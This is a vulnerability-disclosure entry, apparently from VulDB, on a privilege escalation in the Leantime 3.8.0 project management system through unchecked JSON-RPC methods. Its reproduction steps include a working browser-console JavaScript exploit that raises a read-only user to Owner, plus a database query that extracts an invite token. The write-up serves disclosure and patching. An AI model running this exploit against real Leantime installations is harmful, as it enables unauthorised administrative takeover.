Gửi #846167: Leantime Leantime project management system 3.8.0 Privilege Escalation / Improper Authorizationthông tin

tiêu đềLeantime Leantime project management system 3.8.0 Privilege Escalation / Improper Authorization
Mô tả Leantime(https://github.com/Leantime/leantime) exposes service-layer methods through a JSON-RPC endpoint (`leantime.rpc.{domain}.{service}.{method}`). The endpoint authenticates the caller (unauthenticated requests return HTTP 401), but the individual `@api`-annotated methods are responsible for their own role/ownership checks, and several high-impact ones perform none. As a result, **any authenticated user holding the lowest role (e.g. "Editor", "Read-only", "Commenter") can call `users.editUser` to set their own account's role to "Owner", or `users.addUser` to create a brand-new Owner account — taking full administrative control of the installation.** The same gap lets a low-privilege user write arbitrary global settings (`setting.saveSetting`) and read other tenants' client data (`clients.getAll`). ## Reproduction - from the browser UI (no external tools) 1. Login as the owner 2. Create an user with Read only permission: email: [email protected], First name: Test, Last name: Admin 3. Invite the user. Since we are in docker, Email wasn't configured, we need retrieve the token manually. docker exec lt-db mariadb -uroot -prootpw leantime -e "SELECT id,username,pwReset FROM zp_user WHERE pwReset IS NOT NULL;" id username pwReset 12 [email protected] f7355e46-ab6d-46dd-bb54-d6af73c3ba80 Then open in your browser: http://localhost:8090/auth/userInvite/f7355e46-ab6d-46dd-bb54-d6af73c3ba80 → it shows the "set your password / create account" form → set a password → log in. 4. Logout from owner account and sign in with new user. We notice no owner interface for the new user at all. 5. Now login as the user with the password, and run this exploit in dev console: (async () => { const rpc = (method, params) => fetch('/api/jsonrpc', { method:'POST', credentials:'include', headers:{'Content-Type':'application/json','X-Requested-With':'XMLHttpRequest'}, body: JSON.stringify({jsonrpc:'2.0', id:1, method, params}) }).then(r => r.json()); const me = (await rpc('leantime.rpc.users.users.getUser', {})).result; console.log('logged in as:', me.username, '| id', me.id, '| current role', me.role); const res = await rpc('leantime.rpc.users.users.editUser', { values: { firstname: me.firstname, lastname: me.lastname, user: me.username, status: 'a', role: 50, clientId: me.clientId || '' }, id: me.id }); console.log('escalation result:', res, '— now log out and back in'); })();
Nguồn⚠️ https://bytium.com/insights/leantime-priv-escalation-vulnerability-low-priv-to-owner
Người dùng
 suffer (UID 74855)
Đệ trình02/06/2026 17:16 (cách đây 1 tháng)
Kiểm duyệt12/07/2026 07:58 (1 month later)
Trạng tháiđược chấp nhận
Mục VulDB377838 [Leantime đến 3.8.0 JSON-RPC Endpoint editUser/addUser role nâng cao đặc quyền]
điểm20

Might our Artificial Intelligence support you?

Check our Alexa App!